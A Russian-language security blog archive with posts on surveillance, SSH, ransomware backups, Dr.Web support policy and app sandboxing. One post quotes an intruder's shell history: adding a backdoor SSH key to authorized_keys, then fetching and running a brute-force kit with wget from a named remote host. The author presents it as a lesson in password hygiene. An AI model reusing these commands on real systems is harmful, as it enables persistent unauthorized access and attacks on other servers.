Записи с меткой «Security»

Наткнулся тут на вот такую заметку:

http://www.securitylab.ru/news/481604.php

То есть теперь если некий агентЪ из любой спецслужбы США хакает чьи-то системы в другой стране, хоть одиночно, хоть массово — то это не преступление, а «борьба с террористами/педофилами/отрицателями_локалхоста» и прочая «защита национальной безопасности США» в рамках расследования очередной покупки рюкзака и скороварки. Ну или агентЪ просто адресом ошибся, тоже бывает =)

Ссылка на оригинал : http://www.supremecourt.gov/orders/courtorders/frcr16_8mad.pdf

Ну а если какой Мэнинг или Сноуден о грязных делах проведает — то в самой демократичной тюрьме Гуантанамо всегда есть вакантные места для предателей интересов всемирной демократии.

Впрочем, это всё мои фантазии. На самом деле, никто конечно же за населением массово не следит, данные массово не собирает, системы типа Эшелона/СОРМ/Палантира/Призмы — они исключительно на террористов направлены, бэкдоров в виндовс-10 нету, а шифрованная связь в почте/IM обычным гражданам ну совершенно ни к чему, продолжайте в это верить. 😀 😀 😀

Протокол SSH, второй версии которого в этом году исполнилось 20 лет, воистину прекрасен.
Про SSH я уже писал в блоге несколько заметок.

За прошедшие 20 лет он стал стандартом де-факто для обеспечения удаленного доступа / переноса файлов максимально простым и весьма безопасным способом. Некоторые виды шифров успели за это время стать теоретически менее безопасными, и это отразилось на реализации.
(далее…)

Вирусы-шифровальщики никуда не делись. Шли годы, бэкапы никто так и не начал делать. Забавно, но до сих пор кто-то надеется на гарантии по расшифровке. Так вот — гарантий таких нет и не предвидится. Гарантия есть только одна — ваши резервные копии. В идеале — на DVD/BD болванках однократной записи.

Всё остальное гораздо менее надёжно.

Bruteforce-Bot

Posted: 2016-01-27 in IT, Security
Метки:, ,

Настраивая свою впс-ку, один клиент поставил слабый пароль на одну из учёток.

Что произошло дальше ?
Боты нащупали слабый пароль:
Accepted password for teamspeak from 185.56.80.177 port 60850 ssh2

зашли по SSH под логином teamspeak, и дальше сделали простую вещь:

$ cat /home/teamspeak/.bash_history

mkdir .ssh
cd .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAnhdLIoPB1q8Tn2LUsH7edJG7XwaJJ6cjmo3s+GRi\
ViLvNQIHl016+XIUVAL3Y/R5Irhxif88nymSBHgqBdmXtoNxNsdn6PBAPMH9Vx5XJ8Tc\
ELZQ9VW9Q4HfXptrP8Pm+LIya8pn6qhxtFnF3J5fGpfjnWhK3D439rq84l\
ygavU= Master IcS has arrived" >> authorized_keys
chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
passwd
php -v
sendmail
php -v
cd .ssh
ls
wget csmioveni.tripod.com//sshd.tgz
tar xvf sshd.tgz
cd .vmware-root/
ls
./start 213
ls

Обломившись с рутом и отсутствием php, херакеры решили немного с этой машины побрутить чужие сервера.

Пос0ны, налетай на csmioveni.tripod.com//sshd.tgz , к0чай прЕватные брутф0рсеры =)
В архиве оказался каталог .vmware-root, в нём — пара скомпиленных бинарей для брутфорса других серверов, словарик паролей и логинов.

Так что настраивая сервер, лучше сразу ставить нормальные пароли и делать авторизацию по ключам.

Проходя мимо чумного поселения, обнаружил нездоровое бурление и шум. Оказалось, что относительно недавно появившийся новый вирус-криптовальщик, дописывающий расширение .BREAKING_BAD, устроил настоящую бурю у хомячков на файловозках.

Предположу, что злодеи стали применять такую тактику — сперва (пока тушка не палится антивирями совсем) делаются целевые рассылки наиболее вкусным клиентам — бухгалтерам, менеджерам, директорам, технологам и прочему труЪ-ентерпрайзу с кучей ценных файлов и достаточным уровнем нищебродства, чтобы сэкономить на зарплате нормальному админу. Когда же тушка успеет несколько скиснуть, начнёт более-менее сносно палиться на вирус-тотале и потеряет свою исходную пробивную мощь — делается массовая рассылка всем остальным, у кого системы совсем уж непотребно дырявые. Конечно, 90-95% второй волны будет убито ещё на подлёте антиспамом/серверным кламавом/прочим, но и оставшихся жертв хватит — аудитория тут уже не целевая, бьют по площадям, в кого-нибудь да попадёт. И похоже, что попадает.

Хомяки, сильно офигевшие от такой «отаке», валом повалили на форумы аверов. Ну а поскольку понимания сути — ноль, форумы завалило потоком флуда типа «готов купить лицензию на антивирь, но только с ГАРАНТИЯМИ!!11! расшифровки на 100500%», «а давайте вы нахаляву и без смс сделайте супер-универсальный-мега-декриптор, сложно вам что ли», «почему антивирь 8-и летней давности не защитил мою Вин-ХП-СП2 с 6-м ИЕ, за_что_мы_деньги_платим ??!» и тому подобной смешной бредятины.

Видимо, сильно утомившись от общения с нищебродами, Паутинычи сделали ход конём:

Компания «Доктор Веб» сообщает об изменении условий предоставления бесплатных услуг технической поддержки пользователям Dr.Web, пострадавшим от действий троянцев-шифровальщиков семейства Trojan.Encoder. Теперь получить поддержку можно только обладая на момент заражения активной коммерческой лицензией Dr.Web, с установленным продуктом Dr.Web Security Space или Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite (версии 6+).

Решение спорное: всё-таки расшифровка похеренных шифровальщиками файлов — весомый аргумент выбрать продукт в будущем, пусть даже расшифровка возможна не всегда.

С другой стороны — шифрование становится всё крепче, вирусописатели учатся на своих ошибках, и у авера эта возня стала отнимать слишком уже много сил. Как я смог выцепить из форума Паутиныча — они раздобыли мощный вычислительный кластер (хз, построили, арендовали или получили доступ по благотворительности) и сократили время многих операций с недель и месяцев до нескольких часов. Также смогли найти весьма крутых спецов, способных делать криптоанализ и местами даже успешно. Насколько это круто ? Это неимоверно круто. Спецы по такому криптоанализу уникальны даже в масштабах мира, и каждый такой кадр (жуткий гибрид хакера-реверсера и узкоспециализированного математика-криптографа) реально на вес золота. Однако современное стойкое крипто не по зубам даже им, времени на анализ всё равно уходит масса, хомячки всё равно недовольны и грозятся «сменить антивирус и не купить лицензию». И даже случаи успешных расшифровок их не утешают и ничему не учат.

Итог — всех нищебродов за борт. Не купил антивирь заранее, сэкономил 200 рублей на болванки для бэкапа фоток, сэкономил на зарплате админу и серверах для бэкапа — вот сиди и набивай данные заново, нефиг флудить на форумах. И никого не ебёт, что завтра крайний срок сдачи годовой отчётности!

Видимо, поток жертв стал таким огромным, а разбор чужих конюшен настолько непродуктивным, что Паутинычи решили усилия своих квалифицированных спецов направить только на работу с теми, у кого шансов несколько больше — то есть у кого стоял их продукт ДО факта заражения. И я уверен, что объехать их будет трудно.

Ну и в завершение — немного юмористических рассказов, как использование виндовс снижает совокупную стоимость владения, особенно в домашнем секторе и малом / среднем бизнесе. На фоне выкупов в 20-50-100 биткойнов с компа очень прикольненько читать.

Здарова, люди!

Если вас сюда занесло неведомо какими потоками сетевого траффика, значит, ваш разум жаждет новых знаний, явно имеющих отношение к сетевой безопасности и связанной с ней паранойи.

Год назад я уже немного описал ключевые моменты, которые должны быть сделаны, если вы претендуете на то, чтобы ваш компьютер можно было назвать достаточно защищённым.

После года чтения теории (я надеюсь, вы теперь без проблем можете сказать собеседнику, где взять ваш открытый ключ PGP) предлагаю приступить к практике. Поехали.
(далее…)

Всем превеД! Ползая по интернету, наткнулся тут на прекрасную подборку новых гаджетов, модных в текущем осеннем сезоне.
Если вы подумали было про iPhone6 ай-Хрень-6 — то вас явно занесло не в ту сеть, про это надкусанное поделие и без меня напишут много слюняво-розовых восторженных отзывов. Я же продолжу тему предыдущего модного сезона, открытого по весне товарищем Эдвардом:
https://aminux.wordpress.com/2014/02/06/новые-модные-гаджеты/
(далее…)

Всем привет.

В этой заметке я снова начну знатно расчёсывать паранойю. Почти два года назад я писал, почему имеет смысл изолировать потенциально опасные приложения и как это делать, где и что гуглить. Через некоторые время я написал ещё заметку, как запускать обновлёный скайп версии 4.2 в защищенном SELinux-окружении и фиксить возможные проблемы.

Если вам интересно — читаем далее.
(далее…)

Если вы ещё не чувствуете слежки, и у вас нет паранойи — то это вовсе не значит, что за вами не следят.
Я расскажу пару примеров, а вы сами решайте, согласны со мной или нет. …

(далее…)

Minecraft 1.6.2 Java Policy

Posted: 2013-10-26 in IT, Security, Software
Метки:

Если вы сторонник изоляции приложений — выкладываю вам готовую политику для Minecraft 1.6.2
По мотивам прошлой статьи. …

(далее…)

Веб-шелл — это такой скрипт, который позволяет выполнять локально на веб-сервере различные команды, с привилегиями пользователя, от имени которого оный веб-сервер запущен.
Очень необычен пример такого шелла, который пахнет Perl-магией за версту:
http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html

(далее…)

В этой заметке я снова буду нагнетать паранойю, связанную с недостаточно доверенными приложениями. Если вы готовы потратить 10 минут времени на возведение ещё одного рубежа защиты на вашей машине — добро пожаловать. …

(далее…)

Ситуация: звонит клиент, у которого начиная с понедельника стал странно работать инет, раздаваемый сервером на базе FreeBSD в связке с UTM. Симптомы — при пинге не все пакеты проходят, часть сайтов рандомно не открывается. …

(далее…)

Два с лишним года назад я написал заметку про использование такой штуки, как WINEPREFIX. С тех пор сменилась не одна версия вайна, и многие механизмы сменили свою логику работы. Местами — к сожалению не в лучшую сторону. …

(далее…)

Занятная ИБ

Posted: 2012-09-29 in IT, Security
Метки:

Всем привет. Немного про информационную безопасность.

Есть такой ресурс — SecurityLab.ru . Новости на данном ресурсе — так себе, и желтизной разят, но вот блоги ряда специалистов, там пишущих — определённо доставляют. Некоторые заметки просто прекрасны:

Поддельные антивирусы – программы, которые не делают ничего, но при этом стоят денег. Такой феномен не возможен ни для какого другого класса программ, потому что там безделье не скрыть. Можете себе представить фейковый графический редактор или поддельный шутер?

Как так получилось, что пустое байтопинание проходит только с нашей с вами области – в защите информации? Не знаю, как вам, а мне обидно. Это роднит наши программы с какими-нибудь очистителями кармы или стабилизаторами эгрегора.

Специальная кибернетическая терминология вытеснялась бытовой («файл» —> «документ»; «каталог» —> «папка»; «запустить программу» —> «открыть приложение»). Создавались интерфейсы над интерфейсами, которые всё более отчуждали пользователя от сути происходящего в недрах машины.

В итоге среднего чайника убедили, что он умеет и знает. «Чего тут знать? Тыкай мышью пальцем и выбирай из меню!» Но настоящие знания и умения от этого не появились. Айтишник среди пользователей – как зрячий среди слепых, обманывает как пожелает. Хакер же – обманывает айтишника как слепого. Знание каждого уровня «вглубь» даёт качественное преимущество над всеми плавающими выше.